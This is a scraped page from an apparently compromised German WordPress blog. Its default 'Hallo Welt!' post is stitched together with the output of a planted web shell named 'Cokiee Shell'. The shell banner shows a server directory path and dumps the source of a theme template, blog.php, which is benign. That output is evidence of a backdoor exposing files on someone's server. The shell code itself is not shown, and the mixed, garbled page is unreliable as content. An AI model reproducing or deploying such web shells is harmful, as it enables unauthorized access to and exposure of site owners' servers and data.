Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/themes/splendor/ |
Current File : //var/www/web284/html/wp-content/themes/splendor/blog.php |
<?php // Template Name: Blog Template ?> <?php get_header(); global $more; $more = 0; ?> <?php $title = get_the_title(); if ( $title == "Left SideBar") $smof_data['blog_sidebar_position'] = "Left Sidebar"; if ( $title == "Without SideBar") $smof_data['blog_sidebar_position'] = "Without Sidebar"; if ( $title == "Medium Without SideBar") $smof_data['blog_sidebar_position'] = "Without Sidebar"; if ( $title == "Medium Right Sidebar") $smof_data['sl_blog_style'] = "Medium Images"; if ( $title == "Medium Left Sidebar") $smof_data['sl_blog_style'] = "Medium Images"; if ( $title == "Medium Left Sidebar") $smof_data['blog_sidebar_position'] = "Left Sidebar"; ?> <?php if ($smof_data['sl_blog_style'] == "Medium Images") { ?> <div class="main_content_area"> <div class="container"> <div class="row"> <?php include_once("framework/blogs/style2.php"); ?> </div> </div> </div> <?php }; ?> <?php if ($smof_data['sl_blog_style'] == "Large Images") { ?> <div class="main_content_area"> <div class="container"> <div class="row"> <?php include_once("framework/blogs/style1.php"); ?> </div> </div> </div> <?php }; ?> <?php get_footer(); ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare